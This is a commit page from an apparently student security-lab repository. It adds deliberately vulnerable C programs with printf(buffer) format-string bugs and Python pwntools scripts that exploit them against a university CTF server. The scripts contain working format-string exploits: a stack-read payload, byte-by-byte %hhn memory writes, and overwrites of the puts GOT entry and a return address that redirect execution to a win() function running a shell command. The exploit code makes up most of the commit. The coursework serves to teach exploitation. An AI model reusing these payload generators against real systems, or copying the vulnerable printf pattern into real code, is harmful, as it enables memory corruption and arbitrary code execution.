didas/ssof_labs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Lab7

Browse Source
This commit is contained in:
didas72
2026-01-08 19:16:57 +00:00
parent 555b9062f3
commit 82e15702a7
22 changed files with 376 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
pa/lab7/01_local_read Executable file
View File

Binary file not shown.

20
pa/lab7/01_local_read.c Normal file
View File

@@ -0,0 +1,20 @@
// gcc -m32 -Wall -Wextra -ggdb -no-pie
#include <stdio.h>
#include <unistd.h>
#include "get_flag.h"
#define BUFFER_LEN 64
char buffer[BUFFER_LEN] = {0};
void vuln() {
// Never prints secret_value
char *secret_value = get_flag();
printf(buffer);
}
int main() {
read(0, buffer, BUFFER_LEN-1);
vuln();
}

BIN
pa/lab7/03_write Executable file
View File

Binary file not shown.

27
pa/lab7/03_write.c Normal file
View File

@@ -0,0 +1,27 @@
// gcc -m32 -Wall -Wextra -ggdb -no-pie
#include <stdio.h>
#include <unistd.h>
#include "get_flag.h"
#define BUFFER_LEN 128
unsigned int target = 0;
void vuln() {
char buffer[BUFFER_LEN] = {0};
read(0, buffer, BUFFER_LEN-1);
printf(buffer);
if (target != 0) {
printf("Success! You hit the target!\n");
printf("Here is your flag: %s\n", get_flag());
} else {
printf("Oops, not quite!\n");
}
}
int main() {
vuln();
}

BIN
pa/lab7/04_match_value Executable file
View File

Binary file not shown.

27
pa/lab7/04_match_value.c Normal file
View File

@@ -0,0 +1,27 @@
// gcc -m32 -Wall -Wextra -ggdb -no-pie
#include <stdio.h>
#include <unistd.h>
#include "get_flag.h"
#define BUFFER_LEN 128
unsigned int target = 0;
void vuln() {
char buffer[BUFFER_LEN] = {0};
read(0, buffer, BUFFER_LEN-1);
printf(buffer);
if (target == 327) {
printf("Success! You hit the target!\n");
printf("Here is your flag: %s\n", get_flag());
} else {
printf("Oops, not quite! The target was: 327\nCurrent value is %d.\n", target);
}
}
int main() {
vuln();
}

BIN
pa/lab7/05_write_specific_byte Normal file
View File

Binary file not shown.

29
pa/lab7/05_write_specific_byte.c Normal file
View File

@@ -0,0 +1,29 @@
// gcc -m32 -Wall -Wextra -ggdb -no-pie
#include <stdio.h>
#include <unistd.h>
#include "get_flag.h"
#define BUFFER_LEN 128
unsigned int target_before = 0;
unsigned int target = 0;
unsigned int target_after = 0;
void vuln() {
char buffer[BUFFER_LEN] = {0};
read(0, buffer, BUFFER_LEN-1);
printf(buffer);
if (((target >> 24) & 0xff) == 2) {
printf("Success! You hit the target!\n");
printf("Here is your flag: %s\n", get_flag());
} else {
printf("Oops, not quite! The target was: 2\nCurrent value is %x.\n", target >> 24);
}
}
int main() {
vuln();
}

BIN
pa/lab7/06_write_big_number Executable file
View File

Binary file not shown.

29
pa/lab7/06_write_big_number.c Normal file
View File

@@ -0,0 +1,29 @@
// gcc -m32 -Wall -Wextra -ggdb -no-pie
#include <stdio.h>
#include <unistd.h>
#include "get_flag.h"
#define BUFFER_LEN 128
unsigned int target_before = 0;
unsigned int target = 0;
unsigned int target_after = 0;
void vuln() {
char buffer[BUFFER_LEN] = {0};
read(0, buffer, BUFFER_LEN-1);
printf(buffer);
if (target == 0xdeadbeef) {
printf("Success! You hit the target!\n");
printf("Here is your flag: %s\n", get_flag());
} else {
printf("Oops, not quite! The target was: 0xdeadbeef\nCurrent value is 0x%08x\n", target);
}
}
int main() {
vuln();
}

BIN
pa/lab7/07_call_functions Executable file
View File

Binary file not shown.

24
pa/lab7/07_call_functions.c Normal file
View File

@@ -0,0 +1,24 @@
// gcc -m32 -Wall -Wextra -ggdb -no-pie
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFFER_LEN 128
void win() {
printf("You win!");
system("cat /home/ctf/flag");
}
void vuln() {
char buffer[BUFFER_LEN] = {0};
read(0, buffer, BUFFER_LEN-1);
printf(buffer);
puts("Bye!\n");
}
int main() {
vuln();
}

BIN
pa/lab7/08_return Executable file
View File

Binary file not shown.

23
pa/lab7/08_return.c Normal file
View File

@@ -0,0 +1,23 @@
// gcc -m32 -Wall -Wextra -ggdb -no-pie
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFFER_LEN 128
void win() {
printf("You win!");
system("cat /home/ctf/flag");
}
void vuln() {
char buffer[BUFFER_LEN] = {0};
read(0, buffer, BUFFER_LEN-1);
printf(buffer);
}
int main() {
vuln();
}

42
pa/lab7/chall_call_functions_again.py Normal file
View File

@@ -0,0 +1,42 @@
from pwn import remote, process, p32, ELF
# Does not deal with \0s in any pointers needed
def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
addrs: bytes = b""
writes: bytes = b""
cum_chars: int = 4 * len(data)
for offset in range(len(data)):
addr = base + offset
addrs += p32(addr)
arg_n = arg_base + offset
n = data[offset] - (cum_chars % 256)
if n < 8: n += 256
print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
write = f"%{n}x%{arg_n}$hhn"
print(write)
writes += write.encode('utf-8')
cum_chars += n
pl = addrs + writes
if b"\0" in pl: raise Exception("Payload requires a \\0")
return pl
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25197
conn = remote(HOST, PORT)
#conn = process("07_call_functions")
#input()
elf = ELF("07_call_functions")
got_puts = elf.got['puts']
win = elf.sym['win']
pl = print_to_ram(got_puts, 7, p32(win)) + b"\n"
print(f"Payload: ({len(pl)})", pl, "\n\n")
#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)

12
pa/lab7/chall_local_read.py Normal file
View File

@@ -0,0 +1,12 @@
from pwn import remote
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25191
conn = remote(HOST, PORT)
pl = b"%7$s\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)

41
pa/lab7/chall_return_address_again.py Normal file
View File

@@ -0,0 +1,41 @@
from pwn import remote, process, p32, ELF
# Does not deal with \0s in any pointers needed
def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
addrs: bytes = b""
writes: bytes = b""
cum_chars: int = 4 * len(data)
for offset in range(len(data)):
addr = base + offset
addrs += p32(addr)
arg_n = arg_base + offset
n = data[offset] - (cum_chars % 256)
if n < 8: n += 256
write = f"%{n}x%{arg_n}$hhn"
writes += write.encode('utf-8')
cum_chars += n
pl = addrs + writes
if b"\0" in pl: raise Exception("Payload requires a \\0")
return pl
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25198
conn = remote(HOST, PORT)
#conn = process("08_return")
#input()
elf = ELF("08_return")
# dest local is ffffcc1c, which is 1$ + 144
# remote 1$ is ffffdc6c, so dest should be ffffdc5c
dest = 0xffffdcfc
win = elf.sym['win']
pl = print_to_ram(dest, 7, p32(win)) + b"%3$08x\n"
print(f"Win={hex(win)} Payload: ({len(pl)})", pl, "\n\n")
#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
conn.send(pl)
conn.interactive()

12
pa/lab7/chall_short_local_read.py Normal file
View File

@@ -0,0 +1,12 @@
from pwn import remote
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25192
conn = remote(HOST, PORT)
pl = b"%7$s\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)

38
pa/lab7/chall_write_big_numbers.py Normal file
View File

@@ -0,0 +1,38 @@
from pwn import remote, process, p32
# Does not deal with \0s in any pointers needed
def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
addrs: bytes = b""
writes: bytes = b""
cum_chars: int = 4 * len(data)
for offset in range(len(data)):
addr = base + offset
addrs += p32(addr)
arg_n = arg_base + offset
n = data[offset] - (cum_chars % 256)
if n < 8: n += 256
print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
write = f"%{n}x%{arg_n}$hhn"
print(write)
writes += write.encode('utf-8')
cum_chars += n
pl = addrs + writes
if b"\0" in pl: raise Exception("Payload requires a \\0")
return pl
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25196
conn = remote(HOST, PORT)
#conn = process("06_write_big_number")
#input()
pl = print_to_ram(0x804c044, 7, p32(0xdeadbeef)) + b"\n"
print(f"Payload: ({len(pl)})", pl, "\n\n")
#pl = "AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)

18
pa/lab7/chall_write_specific_byte.py Normal file
View File

@@ -0,0 +1,18 @@
from pwn import remote, process, p32
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25195
conn = remote(HOST, PORT)
#conn = process("05_write_specific_byte")
#input()
tgt_addr = p32(0x804c044+3)
#2 + 256 - 4(ptr) = 254
pl = tgt_addr+b"%0254x%7$hhn\n"
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)

18
pa/lab7/chall_write_specific_value.py Normal file
View File

@@ -0,0 +1,18 @@
from pwn import remote, process, p32
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25194
conn = remote(HOST, PORT)
#conn = process("04_match_value")
#input()
tgt_addr = p32(0x804c040)
#327 - 4(ptr) = 323
pl = tgt_addr+b"%0323x%7$hn\n"
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)

16
pa/lab7/chall_write_to_memory.py Normal file
View File

@@ -0,0 +1,16 @@
from pwn import remote, process, p32
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25193
conn = remote(HOST, PORT)
#conn = process("03_write")
#input()
tgt_addr = p32(0x804c040)
pl = tgt_addr+b"AAAA.%7$hhn\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)